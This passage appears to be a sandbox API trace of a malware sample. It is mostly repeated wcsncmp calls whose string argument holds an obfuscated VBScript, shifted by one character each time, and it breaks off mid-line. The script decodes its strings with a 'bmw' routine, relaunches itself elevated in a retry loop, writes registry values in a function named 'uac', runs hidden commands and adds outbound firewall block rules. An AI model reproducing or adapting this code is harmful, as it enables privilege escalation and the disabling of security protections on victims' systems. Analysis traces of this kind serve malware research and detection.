(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.342] wcsncmp (_String1="Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.342] wcsncmp (_String1="ules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.342] wcsncmp (_String1="les\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.342] wcsncmp (_String1="es\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.342] wcsncmp (_String1="s\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 